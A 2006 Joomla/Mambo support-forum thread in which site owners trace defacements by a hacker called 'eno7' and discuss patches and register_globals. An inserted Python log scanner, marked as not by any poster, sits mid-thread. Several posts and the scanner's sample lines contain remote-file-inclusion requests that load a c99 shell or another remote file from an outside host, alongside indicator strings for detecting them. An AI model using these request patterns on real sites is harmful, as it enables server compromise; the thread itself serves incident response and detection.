Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:01 pm
by Maggles
I had a look here:

http://www.[ ** removed hacker's list (kudos) **]/component/option, ... no7/page,1

Because this person has hacked my site twice in the last 2 days. There seems to be a lot of joomla/mambo sites on the list of reported attacks of sites he's hacked and I wondered if anyone has any idea how this guy is getting in. There must be a common component, module or mambot that he's using.

Does anyone have any ideas?

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:07 pm
by Mike G.
We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:19 pm
by Maggles
Mike G. wrote:
We were also hacked by this guy ...

Are you running phpBB component (1.2.4 RC5) on your Joomla! site ?

Regards,

Mike
We used to have a phpBB forum but changed it to vBulletin about a year ago, but there is still a phpBB component installed - my other half is the techie and he did tell me at the weekend why we can't remove it, but I can't remember why right now - I went through removing all components and modules that we don't need/use and removed them, as well as updating any to the latest versions etc... and my other half has tried changing settings to make it even more secure, but he still got to the site for a second time. I'm just glad we take regular backups and save them elsewhere.

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:28 pm
by RobS
@Maggles,

I have sent you a Personal Message.

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 12:30 pm
by Maggles
RobS wrote: @Maggles,

I have sent you a Personal Message.
Thanks, I've emailed you to the address you supplied.

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 1:49 pm
by infograf768
Turk Telecom also for an attack through ext_calendar.
IP 81.215.180.206

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 2:04 pm
by Mike G.
The attack to our site came from 81.213.180.37, also a turkish site.

As I found in the logfiles, they used a PHP/BackDoor script infecting the site through the phpBB download feature !!!

CAUTION! The script resides at this site:  [mod edit: do not post links to viruses. link omitted - ChiefGoFor]  and might become active if you follow the link, my virusscanner (McAfee) was detecting it in the browser.

Regards,

Mike

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 2:13 pm
by LorenzoG
Warning, above link contains a trojan virus script .. as advised by the poster

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 3:36 pm
by Mike G.
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.

Regards,

Mike

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 4:05 pm
by ChiefGoFor
Mike G. wrote:
Hmm ... but it might be helpful for other users to know what to search in their logfiles ....  :-\

So look for "eno7" in your logfiles or "c99.txt" to identify whether some of your modules have been also affected by this nasty script.
I agree with you. It was kind of a catch 22 there. Your solution for searching for those key terms is great! Thank you for the information.

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 10, 2006 4:11 pm
by RobS
Searching for "CONFIG_EXT", "mosConfig_absolute_path" and "mosConfig_live_site" will also reveal some of the recent exploit attempts.
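As an added example (not code from any poster in this thread), a small Python scanner that applies the search terms Mike G. and RobS list above to Apache access-log lines and also flags any query parameter whose value is itself a URL, the remote-include pattern visible in the log lines quoted later in the thread. The sample lines, IP addresses and host names are constructed placeholders.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Strings the thread suggests searching for, plus the shell filename seen in the logs.
INDICATORS = ("eno7", "c99.txt", "CONFIG_EXT",
              "mosConfig_absolute_path", "mosConfig_live_site")

# Apache common/combined access-log prefix: client IP, identity, user, timestamp,
# request line, status. Everything after the status is ignored here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def suspicious_reasons(target):
    """Return why a request target looks like an include-injection attempt ([] if clean)."""
    reasons = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # The remote-file-inclusion pattern: a parameter whose value is itself a URL.
        if re.match(r'(?i)^(https?|ftp)://', value):
            reasons.append("url in parameter " + name)
        for ind in INDICATORS:
            if ind in name or ind in value:
                reasons.append("indicator " + ind)
    return sorted(set(reasons))

def scan_access_log(lines):
    """Return (ip, status, target, reasons) for every flagged request line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = suspicious_reasons(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("status"), m.group("target"), reasons))
    return hits

# Constructed sample lines modelled on the format quoted in the thread;
# IPs (TEST-NET range) and host names are placeholders, not real indicators.
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2006:08:50:01 -0400] "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '192.0.2.20 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://attacker.example/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0"',
    '192.0.2.30 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://attacker.example/images/c99.txt?ls HTTP/1.0" 200 18278 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, status, target, reasons in scan_access_log(SAMPLE_LOG):
        # A 200 status means the vulnerable script served the request, not that it was blocked.
        print(ip, status, target, ", ".join(reasons))
```

Feed it your real raw access log line by line; any hit with a 200 status is a request the server actually executed and the named component should be checked for modified files.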

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:16 pm
by CiPHeR
Our site also got hacked this weekend by this same Eno7 guy - his page overwrites your configuration.php file - how do we prevent this from happening again... this is a very serious issue.  I am running the latest Joomla 1.0.10 and VirtueMart 1.0.6 along with SMF RC1.2.  Is there some common denominator that allows this guy easy access to hack Joomla powered sites?  Everything in our root folder of our site is read only, so how did this happen?

Thanks

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:26 pm
by ChiefGoFor
To my knowledge, this is not a "Joomla" issue. It is an issue with the components not using some key Joomla Security measures. I think in your case, the culprit is SMF.

RobS knows more about it than I do, so I will let him give you a more formal answer.

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:38 pm
by anna.y
What are the practical steps to restore the website?  We've just been hacked through SMF component:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=[EDITED by mod for security reasons]?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

And then what are the practical steps to prevent it from recurring?

Thank you

Anna

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:45 pm
by infograf768

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 2:52 pm
by anna.y
Thank you

Anna

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 17, 2006 3:32 pm
by CiPHeR
Thanks...

One question... will that fix prevent this clown from doing this again?

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 9:22 am
by kolle
CiPHeR wrote: One question... will that fix prevent this clown from doing this again?
I'd love to know that!
anybody..  :-*

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 3:57 pm
by zomertje
Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx

If it comes from the same place
Or disable the component and upgrade :)

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Jul 24, 2006 5:42 pm
by Peter Koch
zomertje wrote: Block the IP in the .htaccess file:

deny from xxx.xxx.xxx.xxx
That won't help since it is a dynamic IP of that provider who is known to support or at least not do anything against hackers (his name not allowed to be told in these forums otherwise you get flamed). The same computer may have another IP next time.

You would need to ban all IPs of that provider. In case you need them PM me and I will send you the whole range.

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 2:25 am
by anna.y
CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 3:07 am
by rliskey
I had 7 sites hacked by someone with the same signature. Only three of these sites were Joomla sites. They defaced the index.php file and uploaded a file called "fix.php". If they did more I haven't found it yet.

What all the hacked sites have in common is, 1) they're all at one ISP and 2) they're all using PHP/MySQL.

Seems the exploit could be seeking out ANY poor php code, whether in a Joomla component or in any other script.

If Joomla pros would like log files or other details, contact me.

I'd also appreciate some help. Rebuilding seven sites is an intimidating task, especially since the way they're getting in doesn't appear to be clear yet.

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 5:28 am
by rliskey
Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 6:39 am
by infograf768
using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 12:00 pm
by CiPHeR
anna.y wrote:
CiPHeR wrote: Thanks...

One question... will that fix prevent this clown from doing this again?
Yes, placing that one line in the insecure files prevented the hacker gaining access to MY website despite literally hundreds of attempts from various IPs from various countries.

Additionally my Server Host turned global_registers to OFF as recommended.

Hope this works for you as well

Anna
I don't know why all hosts DON'T have register globals=OFF!

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 12:16 pm
by Elpie
CiPHeR wrote: I don't know why all hosts DON'T have register globals=OFF!
register_globals is not, in itself, insecure - the problem is that globals is often relied upon by inexperienced developers who are unaware of the issues that can arise with globals if their code is not clean and secure. Because so many scripts rely on register_globals being on, hosts have been reluctant to turn them off (or keep them off if they are running PHP 4.2.0 or higher) - you can imagine the screams from customers if hosts suddenly disabled globals and people had their sites breaking all over the servers!
So, if people do not report to their hosts when sites get hacked, or don't ask their hosts to turn register_globals off, hosts will sit in blissful ignorance thinking their customers are happy with the settings the way they are.

Re: Joomla/MamboHacked Sites By eno7

Posted: Tue Jul 25, 2006 4:56 pm
by anna.y
infograf768 wrote: using the vulnerability in ext-calendar.
You should back-up your db, delete all your root files and reinstall Joomla and the proven corrected components/add-ons.
This is the only way to be sure that all will be OK
I got hacked through an older version of com_SMF and deleting all root files and re-installing everything was NOT an option.

All I had to do in addition to adding the recommended line was check which files were removed or altered by the hacker (two) and simply get those two files from my site backup.

It was rather simple and as I said despite hundreds of attempts of hacking I'm having no further problems (keeping my fingers crossed is probably helping as well...  ;))

Anna 

Re: Joomla/MamboHacked Sites By eno7

Posted: Wed Aug 09, 2006 8:17 am
by omlex
How was he able to alter the MYSQL db?

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Aug 14, 2006 2:46 am
by berlin
rliskey wrote: Following the trail...

From the log files. Is this how they got in? What might this do?

85.108.122.215 - - [18/Jul/2006:10:14:18 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.xxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.0" 200 18278 http://www.xxxxxxxxxx.com "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "-"
I was hacked by a turkish hacker today.

[14-Aug-2006 07:20:22] PHP Warning:  main(http://mi.verizon.net.do/carlos18/therules25.dot): failed to open stream: HTTP request failed! HTTP/1.1 404 Object Not Found in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening 'http://mi.verizon.net.do/carlos18/therules25.dot' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 13
[14-Aug-2006 07:20:22] PHP Warning:  main(): Failed opening '' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in http://www.turx.nl/components/com_extcalendar/upload/Thehacker?/includes/HTML_toolbar.php on line 97
I don't know why it shows turx.nl. Is extcalendar the culprit?

Re: Joomla/MamboHacked Sites By eno7

Posted: Mon Aug 14, 2006 6:13 am
by infograf768
What you are posting looks like the error log and not the raw logs.

Download and open your raw logs in an editor to check for GET and "mosconfig" strings so as to figure out exactly where they got in.